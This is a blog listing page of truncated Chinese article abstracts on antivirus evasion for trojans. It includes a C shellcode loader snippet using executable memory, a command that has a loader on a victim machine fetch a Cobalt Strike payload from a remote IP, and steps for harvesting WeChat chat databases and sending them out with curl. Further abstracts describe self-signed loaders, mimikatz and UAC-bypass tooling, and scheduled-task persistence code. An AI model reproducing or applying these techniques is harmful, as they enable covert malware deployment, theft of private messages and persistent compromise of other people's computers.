zZ华 IP属地:广东

文章 关注 粉丝 访问 贡献
 
共 100 篇文章
显示摘要每页显示  条
shellcode加载代码如下所示:#include <Windows.h>unsigned char shellcode[] ='''''''''''''''';void CallBack() { void* p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(p, shellcode, sizeof(shellcode)); EnumUILanguage...
wxid_xxxxxxxx\Msg\Multi\MSG0.db >聊天记录wxid_xxxxxxxx\Msg\Multi\MSG1.db >聊天记录wxid_xxxxxxxx\Msg\Multi\MSG2.db >聊天记录wxid_xxxxxxxx\Msg\MicroMsg.db >Contact字段 >好友列表wxid_xxxxxxxx\Msg\MediaMsg.db >语音 >格式为silk.https://github.com/c1y2m3/FileSearch服务端接收文件使用curl将打包压缩的文件...
CS木马分离免杀实操(过360,火狐和WindowsDefinder)木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。3. 加载器的准备:使用命令(文件muma.cpp,文章底部链接下载即可):x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe ...
文章开头,上次写的免杀生成脚本,存在一个致命问题,那就是识别main加载器,这次更改特征,增加随机字符串函数,每次的打包命令都不一样,可变相的绕过杀软。以此类推,在最后文件去import加载器,会达到绕过杀软的机制。随机数函数python已经有了,因只有数字,可能不会很强大,写一个随机a-f函数。测试上线,记住,需要运行lnfti0.py.lnfti0...
[新型编码最强免杀]可过大部分杀软。网上分离免杀已经大部分不能用了,在此基础上进行五层AES加密,发现也不行,然后自己编写测试出''''''''玛卡巴卡编码'''''''',该编码并未公开,所以不在识别库在运行的过程中为了绕过部分杀软检测会进行1亿次函数跳转和10亿次if-else判断...
CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)分离免杀:木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。4. 免杀测试:将加载器power.exe 上传至 受害机后,开启各类EDR,尝试上线CS,命令:power.exe 192.168.1.220 8880 payload_x64.bin ,CS成功上...
红队攻防之exe文件签名免杀。2、使用 cobaltstrike分离免杀工具生成loader.exe文件。3、使用UPX对生成的exe文件进行加壳,加壳前后对比文件的大小。4、对loader.exe进行制作并签发证书-数字签名。(2)、使用makecert命令制作证书,sv-私钥文件名,ss-主题的证书存储名称,n-证书颁发对象,r-证书存储位置,输入私钥密码。(3)、注册证书与签...
一个简单好用的内网渗透免杀工具。工具简介。更改payload.ini下的加载路径,加载不同的功能,比如mimikatz免杀defender免杀360除了内存执行config下的固定功能外,还可以使用cs或者msf生成payload.bin(注意需要x86)进行加载上线。2023-8-07 更新 bypassUAC功能 使用方法:将payload.ini里的配置改为./config/BypassUAC.dat 运行BypassUAC.exe20...
基于python的火绒、360、defender免杀shellcode loader.shellcode loader,bypassav,免杀,一款基于python的shellcode免杀加载器evilhiding v1.1.将shellcode和即将生成的a.txt的url填入main.pyshellcode=b''''''''''''''''url='''''''''...
//设置计划任务名称 //创建ITaskService的实例 ITaskService* pService = NULL; hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService); // 链接到任务实例 hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); // 获取指向根任务文件夹的指针。
帮助 | 留言交流 | 联系我们 | 服务条款 | 下载网文摘手 | 下载手机客户端
北京六智信息技术股份有限公司 Copyright© 2005-2024 360doc.com , All Rights Reserved
京ICP证090625号 京ICP备05038915号 京网文[2016]6433-853号 京公网安备11010502030377号
返回
顶部